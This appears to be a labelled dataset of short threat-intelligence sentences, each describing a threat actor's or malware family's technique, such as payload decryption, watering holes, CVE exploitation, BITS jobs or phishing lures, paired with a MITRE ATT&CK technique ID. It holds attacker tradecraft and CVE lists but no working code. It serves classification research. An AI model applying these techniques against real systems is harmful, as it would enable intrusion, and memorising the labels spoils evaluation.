{"text1":"WellMess can decode and decrypt data received from C2.","labels":"['T1140']"}
{"text1":"WhisperGate can deobfuscate downloaded files stored in reverse byte order and decrypt embedded resources using multiple XOR operations.","labels":"['T1140']"}
{"text1":"WindTail has the ability to decrypt strings using hard-coded AES keys.","labels":"['T1140']"}
{"text1":"Winnti for Linux has decoded XOR encoded strings holding its configuration upon execution.","labels":"['T1140']"}
{"text1":"ZIRCONIUM has used the AES256 algorithm with a SHA1 derived key to decrypt exploit code.","labels":"['T1140']"}
{"text1":"Zebrocy decodes its secondary payload and writes it to the victim\u2019s machine. Zebrocy also uses AES and XOR to decrypt strings and payloads.","labels":"['T1140']"}
{"text1":"ZeroT shellcode decrypts and decompresses its RC4-encrypted payload.","labels":"['T1140']"}
{"text1":"Zeus Panda decrypts strings in the code during the execution process.","labels":"['T1140']"}
{"text1":"certutil has been used to decode binaries hidden inside certificate files as Base64 information.","labels":"['T1140']"}
{"text1":"menuPass has used certutil in a macro to decode base64-encoded content contained in a dropper document attached to an email. The group has also used \"certutil -decode\" to decode files on the victim\u2019s machine when dropping UPPERCUT.","labels":"['T1140']"}
{"text1":"xCaon has decoded strings from the C2 server before executing commands.","labels":"['T1140']"}
{"text1":"Bundlore can install malicious browser extensions that are used to hijack user searches.","labels":"['T1176']"}
{"text1":"Kimsuky has used Google Chrome browser extensions to infect victims and to steal passwords and cookies.","labels":"['T1176']"}
{"text1":"Agent Tesla has the ability to use form-grabbing to extract data from web data forms.","labels":"['T1185']"}
{"text1":"Carberp has captured credentials when a user performs login through a SSL session.","labels":"['T1185']"}
{"text1":"Cobalt Strike can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates.","labels":"['T1185']"}
{"text1":"Dridex can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies.","labels":"['T1185']"}
{"text1":"QakBot can use advanced web injects to steal web banking credentials.","labels":"['T1185']"}
{"text1":"TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page.","labels":"['T1185']"}
{"text1":"Ursnif has injected HTML codes into banking sites to steal sensitive online banking information (ex: usernames and passwords).","labels":"['T1185']"}
{"text1":"DarkHydrus used Template Injection to launch an authentication window for users to enter their credentials.","labels":"['T1187']"}
{"text1":"Dragonfly 2.0 has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.","labels":"['T1187']"}
{"text1":"Dragonfly has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.","labels":"['T1187']"}
{"text1":"APT19 performed a watering hole attack on forbes.com in 2014 to compromise targets.","labels":"['T1189']"}
{"text1":"APT32 has infected victims by tricking them into visiting compromised watering hole websites.","labels":"['T1189']"}
{"text1":"APT37 has used strategic web compromises, particularly of South Korean websites, to distribute malware. The group has also used torrent file-sharing sites to more indiscriminately disseminate malware to victims. As part of their compromises, the group has used a Javascript based profiler called RICECURRY to profile a victim's web browser and deliver malicious code accordingly.","labels":"['T1189']"}
{"text1":"APT38 has conducted watering holes schemes to gain initial access to victims.","labels":"['T1189']"}
{"text1":"Andariel has used watering hole attacks, often with zero-day exploits, to gain initial access to victims within a specific IP range.","labels":"['T1189']"}
{"text1":"Axiom has used watering hole attacks to gain access.","labels":"['T1189']"}
{"text1":"BRONZE BUTLER compromised three Japanese websites using a Flash exploit to perform watering hole attacks.","labels":"['T1189']"}
{"text1":"Bundlore has been spread through malicious advertisements on websites.","labels":"['T1189']"}
{"text1":"Dark Caracal leveraged a watering hole to serve up malicious code.","labels":"['T1189']"}
{"text1":"Darkhotel used embedded iframes on hotel login portals to redirect selected victims to download malware.","labels":"['T1189']"}
{"text1":"Dragonfly 2.0 compromised legitimate organizations' websites to create watering holes to compromise victims.","labels":"['T1189']"}
{"text1":"Dragonfly has compromised targets via strategic web compromise (SWC) utilizing a custom exploit kit.","labels":"['T1189']"}
{"text1":"During Operation Dust Storm, the threat actors used a watering hole attack on a popular software reseller to exploit the then-zero-day Internet Explorer vulnerability CVE-2014-0322.","labels":"['T1189']"}
{"text1":"Earth Lusca has performed watering hole attacks.","labels":"['T1189']"}
{"text1":"Elderwood has delivered zero-day exploits and malware to victims by injecting malicious code into specific public Web pages visited by targets within a particular sector.","labels":"['T1189']"}
{"text1":"Grandoreiro has used compromised websites and Google Ads to bait victims into downloading its installer.","labels":"['T1189']"}
{"text1":"KARAE was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure.","labels":"['T1189']"}
{"text1":"Lazarus Group delivered RATANKBA and other malicious code to victims via a compromised legitimate website.","labels":"['T1189']"}
{"text1":"Leafminer has infected victims using watering holes.","labels":"['T1189']"}
{"text1":"Leviathan has infected victims using watering holes.","labels":"['T1189']"}
{"text1":"LoudMiner is typically bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.","labels":"['T1189']"}
{"text1":"Machete has distributed Machete through a fake blog website.","labels":"['T1189']"}
{"text1":"Magic Hound has conducted watering-hole attacks through media and magazine websites.","labels":"['T1189']"}
{"text1":"PLATINUM has sometimes used drive-by attacks against vulnerable browser plugins.","labels":"['T1189']"}
{"text1":"POORAIM has been delivered through compromised sites acting as watering holes.","labels":"['T1189']"}
{"text1":"Patchwork has used watering holes to deliver files with exploits to initial victims.","labels":"['T1189']"}
{"text1":"REvil has infected victim machines through compromised websites and exploit kits.","labels":"['T1189']"}
{"text1":"Threat Group-3390 has extensively used strategic web compromises to target victims.","labels":"['T1189']"}
{"text1":"Turla has infected victims using watering holes.","labels":"['T1189']"}
{"text1":"Windigo has distributed Windows malware via drive-by downloads.","labels":"['T1189']"}
{"text1":"Windshift has used compromised websites to register custom URL schemes on a remote system.","labels":"['T1189']"}
{"text1":"APT28 has used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144, to gain execution on vulnerable Microsoft Exchange; they have also conducted SQL injection attacks against external websites.","labels":"['T1190']"}
{"text1":"APT29 has exploited CVE-2019-19781 for Citrix, CVE-2019-11510 for Pulse Secure VPNs, CVE-2018-13379 for FortiGate VPNs, and CVE-2019-9670 in Zimbra software to gain access. They have also exploited CVE-2020-0688 against the Microsoft Exchange Control Panel to regain access to a network.","labels":"['T1190']"}
{"text1":"APT39 has used SQL injection for initial compromise.","labels":"['T1190']"}
{"text1":"APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.","labels":"['T1190']"}
{"text1":"Axiom has been observed using SQL injection to gain access to systems.","labels":"['T1190']"}
{"text1":"BackdoorDiplomacy has exploited CVE-2020-5902, an F5 BIP-IP vulnerability, to drop a Linux backdoor. BackdoorDiplomacy has also exploited mis-configured Plesk servers.","labels":"['T1190']"}
{"text1":"BlackTech has exploited a buffer overflow vulnerability in Microsoft Internet Information Services (IIS) 6.0, CVE-2017-7269, in order to establish a new HTTP or command and control (C2) server.","labels":"['T1190']"}
{"text1":"Dragonfly has conducted SQL injection attacks, exploited vulnerabilities CVE-2019-19781 and CVE-2020-0688 for Citrix and MS Exchange, and CVE-2018-13379 for Fortinet VPNs.","labels":"['T1190']"}
{"text1":"During Operation CuckooBees, the threat actors exploited multiple vulnerabilities in externally facing servers.","labels":"['T1190']"}
{"text1":"During Operation Wocao, threat actors gained initial access by exploiting vulnerabilities in JBoss webservers.","labels":"['T1190']"}
{"text1":"Earth Lusca has compromised victims by directly exploiting vulnerabilities of public-facing servers, including those associated with Microsoft Exchange and Oracle GlassFish.","labels":"['T1190']"}
{"text1":"Fox Kitten has exploited known vulnerabilities in Fortinet, PulseSecure, and Palo Alto VPN appliances.","labels":"['T1190']"}
{"text1":"HAFNIUM has exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065  to compromise on-premises versions of Microsoft Exchange Server, enabling access to email accounts and installation of additional malware.","labels":"['T1190']"}
{"text1":"Havij is used to automate SQL injection.","labels":"['T1190']"}
{"text1":"Ke3chang has compromised networks by exploiting Internet-facing applications, including vulnerable Microsoft Exchange and SharePoint servers.","labels":"['T1190']"}
{"text1":"Kimsuky has exploited various vulnerabilities for initial access, including Microsoft Exchange vulnerability CVE-2020-0688.","labels":"['T1190']"}
{"text1":"Magic Hound has used open-source JNDI exploit kits to exploit Log4j (CVE-2021-44228) and has exploited ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) on MS Exchange servers.","labels":"['T1190']"}
{"text1":"MuddyWater has exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688).","labels":"['T1190']"}
{"text1":"Operation Wocao has gained initial access via vulnerable webservers.","labels":"['T1190']"}
{"text1":"Rocke exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware.","labels":"['T1190']"}
{"text1":"SoreFang can gain access by exploiting a Sangfor SSL VPN vulnerability that allows for the placement and delivery of malicious update binaries.","labels":"['T1190']"}
{"text1":"Threat Group-3390 has exploited the Microsoft SharePoint vulnerability CVE-2019-0604 and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Exchange Server.","labels":"['T1190']"}
{"text1":"Volatile Cedar has targeted publicly facing web servers, with both automatic and manual vulnerability discovery.","labels":"['T1190']"}
{"text1":"menuPass has leveraged vulnerabilities in Pulse Secure VPNs to hijack sessions.","labels":"['T1190']"}
{"text1":"sqlmap can be used to automate exploitation of SQL injection vulnerabilities.","labels":"['T1190']"}
{"text1":"Elderwood has targeted manufacturers in the supply chain for the defense industry.","labels":"['T1195']"}
{"text1":"NotPetya's initial infection vector for the June 27, 2017 compromise was a backdoor in the Ukrainian tax accounting software M.E.Doc.","labels":"['T1195']"}
{"text1":"Smoke Loader was distributed through a compromised update to a Tor client with a coin miner payload.","labels":"['T1195']"}
{"text1":"XCSSET adds malicious code to a host's Xcode projects by enumerating CocoaPods \"target_integrator.rb\" files under the \"\/Library\/Ruby\/Gems\" folder or enumerates all \".xcodeproj\" folders under a given directory. XCSSET then downloads a script and Mach-O file into the Xcode project folder.","labels":"['T1195.001']"}
{"text1":"APT29 gained initial network access to some victims via a trojanized update of SolarWinds Orion software.","labels":"['T1195.002']"}
{"text1":"APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.","labels":"['T1195.002']"}
{"text1":"Cobalt Group has compromised legitimate web browser updates to deliver a backdoor.","labels":"['T1195.002']"}
{"text1":"Dragonfly has placed trojanized installers for control system software on legitimate vendor app stores.","labels":"['T1195.002']"}
{"text1":"GOLD SOUTHFIELD has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR.","labels":"['T1195.002']"}
{"text1":"Gelsemium has compromised software supply chains to gain access to victims.","labels":"['T1195.002']"}
{"text1":"GoldenSpy has been packaged with a legitimate tax preparation software.","labels":"['T1195.002']"}
{"text1":"SUNSPOT malware was designed and used to insert SUNBURST into software builds of the SolarWinds Orion IT management product.","labels":"['T1195.002']"}
{"text1":"Sandworm Team has distributed NotPetya by compromising the legitimate Ukrainian accounting software M.E.Doc and replacing a legitimate software update with a malicious one.","labels":"['T1195.002']"}
{"text1":"Threat Group-3390 has compromised the Able Desktop installer to gain access to victim's environments.","labels":"['T1195.002']"}
{"text1":"A JPIN variant downloads the backdoor payload via the BITS service.","labels":"['T1197']"}
{"text1":"APT39 has used the BITS protocol to exfiltrate stolen data from a compromised host.","labels":"['T1197']"}
{"text1":"BITSAdmin can be used to create BITS Jobs to launch a malicious process.","labels":"['T1197']"}
{"text1":"Cobalt Strike can download a hosted \"beacon\" payload using BITSAdmin.","labels":"['T1197']"}
{"text1":"Egregor has used BITSadmin to download and execute malicious DLLs.","labels":"['T1197']"}
{"text1":"Leviathan has used BITSAdmin to download additional tools.","labels":"['T1197']"}
{"text1":"MarkiRAT can use BITS Utility to connect with the C2 server.","labels":"['T1197']"}
{"text1":"Patchwork has used BITS jobs to download malicious payloads.","labels":"['T1197']"}
{"text1":"ProLock can use BITS jobs to download its malicious payload.","labels":"['T1197']"}
{"text1":"UBoatRAT takes advantage of the \/SetNotifyCmdLine option in BITSAdmin to ensure it stays running on a system to maintain persistence.","labels":"['T1197']"}
{"text1":"APT29 has gained access through compromised accounts at cloud solution partners, and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems.","labels":"['T1199']"}
{"text1":"GOLD SOUTHFIELD has breached Managed Service Providers (MSP's) to deliver malware to MSP customers.","labels":"['T1199']"}
{"text1":"LAPSUS$ has accessed internet-facing identity providers such as Azure Active Directory and Okta to target specific organizations.","labels":"['T1199']"}
{"text1":"Once APT28 gained access to the DCCC network, the group then proceeded to use that access to compromise the DNC network.","labels":"['T1199']"}
{"text1":"POLONIUM has used compromised credentials from an IT company to target downstream customers including a law firm and aviation company.","labels":"['T1199']"}
{"text1":"Sandworm Team has used dedicated network connections from one victim organization to gain unauthorized access to a separate organization.","labels":"['T1199']"}
{"text1":"APT34 has used net.exe in a script with \"net accounts \/domain\" to find the password policy of a domain.","labels":"['T1201']"}
{"text1":"BloodHound can collect password policy information on the target environment.","labels":"['T1201']"}
{"text1":"During Operation CuckooBees, the threat actors used the `net accounts` command as part of their advanced reconnaissance.","labels":"['T1201']"}
{"text1":"Kwampirs collects password policy information with the command \"net accounts\".","labels":"['T1201']"}
{"text1":"OilRig has used net.exe in a script with \"net accounts \/domain\" to find the password policy of a domain.","labels":"['T1201']"}
{"text1":"The \"net accounts\" and \"net accounts \/domain\" commands with Net can be used to obtain password policy information.","labels":"['T1201']"}
{"text1":"Turla has used \"net accounts\" and \"net accounts \/domain\" to acquire password policy information.","labels":"['T1201']"}
{"text1":"Forfiles can be used to subvert controls and possibly conceal command execution by not directly invoking cmd.","labels":"['T1202']"}
{"text1":"Lazarus Group persistence mechanisms have used \"forfiles.exe\" to execute .htm files.","labels":"['T1202']"}
{"text1":"APT12 has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities (CVE-2009-3129, CVE-2012-0158) and vulnerabilities in Adobe Reader and Flash (CVE-2009-4324, CVE-2009-0927, CVE-2011-0609, CVE-2011-0611).","labels":"['T1203']"}
{"text1":"APT28 has exploited Microsoft Office vulnerability CVE-2017-0262 for execution.","labels":"['T1203']"}
{"text1":"APT29 has used multiple software exploits for common client software, like Microsoft Word, Exchange, and Adobe Reader, to gain code execution.","labels":"['T1203']"}
{"text1":"APT3 has exploited the Adobe Flash Player vulnerability CVE-2015-3113 and Internet Explorer vulnerability CVE-2014-1776.","labels":"['T1203']"}
{"text1":"APT32 has used RTF document that includes an exploit to execute malicious code. (CVE-2017-11882)","labels":"['T1203']"}
{"text1":"APT33 has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250), and attempted to gain remote code execution via a security bypass vulnerability (CVE-2017-11774).","labels":"['T1203']"}
{"text1":"APT37 has used exploits for Flash Player (CVE-2016-4117, CVE-2018-4878), Word (CVE-2017-0199), Internet Explorer (CVE-2020-1380 and CVE-2020-26411), and Microsoft Edge (CVE-2021-26411) for execution.","labels":"['T1203']"}
{"text1":"APT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.","labels":"['T1203']"}
{"text1":"Agent Tesla exploits CVE-2017-11882 in Microsoft\u2019s Equation Editor to execute a process.","labels":"['T1203']"}
{"text1":"Agent Tesla has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery.","labels":"['T1203']"}
{"text1":"Aoqin Dragon has exploited CVE-2012-0158 and CVE-2010-3333 for execution against targeted systems.","labels":"['T1203']"}
{"text1":"Axiom has used exploits for multiple vulnerabilities including CVE-2014-0322, CVE-2012-4792, CVE-2012-1889, and CVE-2013-3893.","labels":"['T1203']"}
{"text1":"BITTER has exploited Microsoft Office vulnerabilities CVE-2012-0158, CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802.","labels":"['T1203']"}
{"text1":"BRONZE BUTLER has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution.","labels":"['T1203']"}
{"text1":"Bankshot leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims\u2019 machines.","labels":"['T1203']"}
{"text1":"Cobalt Strike can exploit Oracle Java vulnerabilities for execution, including CVE-2011-3544, CVE-2013-2465, CVE-2012-4681, and CVE-2013-2460.","labels":"['T1203']"}
{"text1":"Confucius has exploited Microsoft Office vulnerabilities, including CVE-2015-1641, CVE-2017-11882, and CVE-2018-0802.","labels":"['T1203']"}
{"text1":"Dragonfly has exploited CVE-2011-0611 in Adobe Flash Player to gain execution on a targeted system.","labels":"['T1203']"}
{"text1":"During Frankenstein, the threat actors exploited CVE-2017-11882 to execute code on the victim's machine.","labels":"['T1203']"}
{"text1":"During Operation Dust Storm, the threat actors exploited Adobe Flash vulnerability CVE-2011-0611, Microsoft Windows Help vulnerability CVE-2010-1885, and several Internet Explorer vulnerabilities, including CVE-2011-1255, CVE-2012-1889, and CVE-2014-0322.","labels":"['T1203']"}
{"text1":"EXOTIC LILY has used malicious documents containing exploits for CVE-2021-40444 affecting Microsoft MSHTML.","labels":"['T1203']"}
{"text1":"Elderwood has used exploitation of endpoint software, including Microsoft Internet Explorer Adobe Flash vulnerabilities, to gain execution. They have also used zero-day exploits.","labels":"['T1203']"}
{"text1":"Ember Bear has exploited Microsoft Office vulnerability CVE-2017-11882.","labels":"['T1203']"}
{"text1":"EvilBunny has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader.","labels":"['T1203']"}
{"text1":"Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution.","labels":"['T1203']"}
{"text1":"InvisiMole has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution.","labels":"['T1203']"}
{"text1":"KeyBoy exploits the vulnerability CVE-2012-0158 for execution.","labels":"['T1203']"}
{"text1":"Lazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.","labels":"['T1203']"}
{"text1":"Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.","labels":"['T1203']"}
{"text1":"MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.","labels":"['T1203']"}
{"text1":"Patchwork uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, CVE-2017-11882, and CVE-2015-1641.","labels":"['T1203']"}
{"text1":"Ramsay has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570.","labels":"['T1203']"}
{"text1":"SUPERNOVA was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148).","labels":"['T1203']"}
{"text1":"Sandworm Team has exploited vulnerabilities in Microsoft PowerPoint via OLE objects (CVE-2014-4114) and Microsoft Word via crafted TIFF images (CVE-2013-3906).","labels":"['T1203']"}
{"text1":"SpeakUp attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3\/4\/5\/6, and the Hadoop YARN ResourceManager.","labels":"['T1203']"}
{"text1":"The White Company has taken advantage of a known vulnerability in Microsoft Word (CVE 2012-0158) to execute code.","labels":"['T1203']"}
{"text1":"Threat Group-3390 has exploited CVE-2018-0798 in Equation Editor.","labels":"['T1203']"}
{"text1":"Tonto Team has exploited Microsoft vulnerabilities, including CVE-2018-0798, CVE-2018-8174, CVE-2018-0802, CVE-2017-11882, CVE-2019-9489 CVE-2020-8468, and CVE-2018-0798 to enable execution of their delivered malicious payloads.","labels":"['T1203']"}
{"text1":"Transparent Tribe has crafted malicious files to exploit CVE-2012-0158 and CVE-2010-3333 for execution.","labels":"['T1203']"}
{"text1":"Tropic Trooper has executed commands through Microsoft security vulnerabilities, including CVE-2017-11882, CVE-2018-0802, and CVE-2012-0158.","labels":"['T1203']"}
{"text1":"admin@338 has exploited client software vulnerabilities for execution, such as Microsoft Word CVE-2012-0158.","labels":"['T1203']"}
{"text1":"LAPSUS$ has recruited target organization employees or contractors who provide credentials and approve an associated MFA prompt, or install remote management software onto a corporate workstation, allowing LAPSUS$ to take control of an authenticated system.","labels":"['T1204']"}
{"text1":"Magic Hound has attempted to get users to execute malware via social media and spearphishing emails.","labels":"['T1204']"}
{"text1":"APT29 has used various forms of spearphishing attempting to get a user to click on a malicous link.","labels":"['T1204.001']"}
{"text1":"APT32 has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails.","labels":"['T1204.001']"}
{"text1":"APT33 has lured users to click links to malicious HTML applications delivered via spearphishing emails.","labels":"['T1204.001']"}
{"text1":"APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious link.","labels":"['T1204.001']"}
{"text1":"Bazar can gain execution after a user clicks on a malicious link to decoy landing pages hosted on Google Docs.","labels":"['T1204.001']"}
{"text1":"Cobalt Group has sent emails containing malicious links that require users to execute a file or macro to infect the victim machine.","labels":"['T1204.001']"}
{"text1":"Dragonfly 2.0 has used various forms of spearphishing in attempts to get users to open links.","labels":"['T1204.001']"}
{"text1":"During Night Dragon, threat actors enticed users to click on links in spearphishing emails to download malware.","labels":"['T1204.001']"}
{"text1":"During Operation Spalax, the threat actors relied on a victim to click on a malicious link distributed via phishing emails.","labels":"['T1204.001']"}
{"text1":"EXOTIC LILY has used malicious links to lure users into executing malicious payloads.","labels":"['T1204.001']"}
{"text1":"Earth Lusca  has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.","labels":"['T1204.001']"}
{"text1":"Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open links.","labels":"['T1204.001']"}
{"text1":"FIN4 has lured victims to click malicious links delivered via spearphishing emails (often sent from compromised accounts).","labels":"['T1204.001']"}
{"text1":"FIN7 has used malicious links to lure victims into downloading malware.","labels":"['T1204.001']"}
{"text1":"Grandoreiro has used malicious links to gain execution on victim machines.","labels":"['T1204.001']"}
{"text1":"Hancitor has relied upon users clicking on a malicious link delivered through phishing.","labels":"['T1204.001']"}
{"text1":"Javali has achieved execution through victims clicking links to malicious websites.","labels":"['T1204.001']"}
{"text1":"KOCTOPUS has relied on victims clicking on a malicious link delivered via email.","labels":"['T1204.001']"}
{"text1":"Kerrdown has gained execution through victims opening malicious links.","labels":"['T1204.001']"}
{"text1":"Kimsuky has lured victims into clicking malicious links.","labels":"['T1204.001']"}
{"text1":"Lazarus Group has sent spearphishing emails in an attempt to lure users to click on a malicious link.","labels":"['T1204.001']"}
{"text1":"LazyScripter has relied upon users clicking on links to malicious files.","labels":"['T1204.001']"}
{"text1":"Leviathan has sent spearphishing email links attempting to get a user to click.","labels":"['T1204.001']"}
{"text1":"Magic Hound has attempted to lure victims into opening malicious links embedded in emails.","labels":"['T1204.001']"}
{"text1":"Melcoz has gained execution through victims opening malicious links.","labels":"['T1204.001']"}
{"text1":"Mofang's spearphishing emails required a user to click the link to connect to a compromised website.","labels":"['T1204.001']"}
{"text1":"MuddyWater has distributed URLs in phishing e-mails that link to lure documents.","labels":"['T1204.001']"}
{"text1":"Mustang Panda has sent malicious links including links directing victims to a Google Drive folder.","labels":"['T1204.001']"}
{"text1":"NETWIRE has been executed through convincing victims into clicking malicious links.","labels":"['T1204.001']"}
{"text1":"ObliqueRAT has gained execution on targeted systems through luring users to click on links to malicious URLs.","labels":"['T1204.001']"}
{"text1":"OilRig has delivered malicious links to achieve execution on the target system.","labels":"['T1204.001']"}
{"text1":"OutSteel has relied on a user to click a malicious link within a spearphishing email.","labels":"['T1204.001']"}
{"text1":"PLEAD has been executed via malicious links in e-mails.","labels":"['T1204.001']"}
{"text1":"QakBot has gained execution through users opening malicious links.","labels":"['T1204.001']"}
{"text1":"SMOKEDHAM has relied upon users clicking on a malicious link delivered through phishing.","labels":"['T1204.001']"}
{"text1":"Sandworm Team has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.","labels":"['T1204.001']"}
{"text1":"Sidewinder has lured targets to click on malicious links to gain execution in the target environment.","labels":"['T1204.001']"}
{"text1":"SpicyOmelette has been executed through malicious links within spearphishing emails.","labels":"['T1204.001']"}
{"text1":"Squirrelwaffle has relied on victims to click on a malicious link send via phishing campaigns.","labels":"['T1204.001']"}
{"text1":"TSCookie has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.","labels":"['T1204.001']"}
{"text1":"Transparent Tribe has directed users to open URLs hosting malicious content.","labels":"['T1204.001']"}
{"text1":"Turla has used spearphishing via a link to get users to download and run their malware.","labels":"['T1204.001']"}
{"text1":"Windshift has used links embedded in e-mails to lure victims into executing malicious code.","labels":"['T1204.001']"}
{"text1":"Wizard Spider has lured victims into clicking a malicious link delivered through spearphishing.","labels":"['T1204.001']"}
{"text1":"ZIRCONIUM has used malicious links in e-mails to lure victims into downloading malware.","labels":"['T1204.001']"}
{"text1":"A Word document delivering TYPEFRAME prompts the user to enable macro execution.","labels":"['T1204.002']"}
{"text1":"APT-C-36 has prompted victims to accept macros in order to execute the subsequent payload.","labels":"['T1204.002']"}
{"text1":"APT28 attempted to get users to click on Microsoft Office attachments containing malicious macro scripts.","labels":"['T1204.002']"}
{"text1":"APT29 has used various forms of spearphishing attempting to get a user to open attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files.","labels":"['T1204.002']"}
{"text1":"APT30 has relied on users to execute malicious file attachments delivered via spearphishing emails.","labels":"['T1204.002']"}
{"text1":"APT32 has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.","labels":"['T1204.002']"}
{"text1":"APT37 has sent spearphishing attachments attempting to get a user to open them.","labels":"['T1204.002']"}
{"text1":"APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious attachment.","labels":"['T1204.002']"}
{"text1":"Ajax Security Team has lured victims into executing malicious files.","labels":"['T1204.002']"}
{"text1":"Aoqin Dragon has lured victims into opening weaponized documents, fake external drives, and fake antivirus to execute malicious payloads.","labels":"['T1204.002']"}
{"text1":"AppleJeus has required user execution of a malicious MSI installer.","labels":"['T1204.002']"}
{"text1":"AppleSeed can achieve execution through users running malicious file attachments distributed via email.","labels":"['T1204.002']"}
{"text1":"Astaroth has used malicious files including VBS, LNK, and HTML for execution.","labels":"['T1204.002']"}
{"text1":"BITTER has attempted to lure victims into opening malicious attachments delivered via spearphishing.","labels":"['T1204.002']"}
{"text1":"BLINDINGCAN has lured victims into executing malicious macros embedded within Microsoft Office documents.","labels":"['T1204.002']"}
{"text1":"BRONZE BUTLER has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.","labels":"['T1204.002']"}
{"text1":"Bad Rabbit has been executed through user installation of an executable disguised as a flash installer.","labels":"['T1204.002']"}
{"text1":"Bisonal has relied on users to execute malicious file attachments delivered via spearphishing emails.","labels":"['T1204.002']"}
{"text1":"BlackTech has used e-mails with malicious documents to lure victims into installing malware.","labels":"['T1204.002']"}
{"text1":"BoomBox has gained execution through user interaction with a malicious file.","labels":"['T1204.002']"}
{"text1":"Bumblebee has relied upon a user opening an ISO file to enable execution of malicious shortcut files and DLLs.","labels":"['T1204.002']"}
{"text1":"Bundlore has attempted to get users to execute a malicious .app file that looks like a Flash Player update.","labels":"['T1204.002']"}
{"text1":"CARROTBALL has been executed through users being lured into opening malicious e-mail attachments.","labels":"['T1204.002']"}
{"text1":"CSPY Downloader has been delivered via malicious documents with embedded macros.","labels":"['T1204.002']"}
{"text1":"Clambling has gained execution through luring victims into opening malicious files.","labels":"['T1204.002']"}
{"text1":"Cobalt Group has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine.","labels":"['T1204.002']"}
{"text1":"DanBot has relied on victims' opening a malicious file for initial execution.","labels":"['T1204.002']"}
{"text1":"Dark Caracal makes their malware look like Flash Player, Office, or PDF documents in order to entice a user to click on it.","labels":"['T1204.002']"}
{"text1":"DnsSystem has lured victims into opening macro-enabled Word documents for execution.","labels":"['T1204.002']"}
{"text1":"Dragonfly has used various forms of spearphishing in attempts to get users to open malicious attachments.","labels":"['T1204.002']"}
{"text1":"During C0011, Transparent Tribe relied on a student target to open a malicious document delivered via email.","labels":"['T1204.002']"}
{"text1":"During Operation Dust Storm, the threat actors relied on potential victims to open a malicious Microsoft Word document sent via email.","labels":"['T1204.002']"}
{"text1":"During Operation Sharpshooter, the threat actors relied on victims executing malicious Microsoft Word or PDF files.","labels":"['T1204.002']"}
{"text1":"During Operation Spalax, the threat actors relied on a victim to open a PDF document and click on an embedded malicious link to download malware.","labels":"['T1204.002']"}
{"text1":"EXOTIC LILY has gained execution through victims clicking on malicious LNK files contained within ISO files, which can execute hidden DLLs within the ISO.","labels":"['T1204.002']"}
{"text1":"Earth Lusca required users to click on a malicious file for the loader to activate.","labels":"['T1204.002']"}
{"text1":"Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open attachments.","labels":"['T1204.002']"}
{"text1":"Ember Bear has attempted to lure victims into executing malicious files.","labels":"['T1204.002']"}
{"text1":"Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing.","labels":"['T1204.002']"}
{"text1":"FIN4 has lured victims to launch malicious attachments delivered via spearphishing emails (often sent from compromised accounts).","labels":"['T1204.002']"}
{"text1":"FIN7 lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.","labels":"['T1204.002']"}
{"text1":"FIN8 has used malicious e-mail attachments to lure victims into executing malware.","labels":"['T1204.002']"}
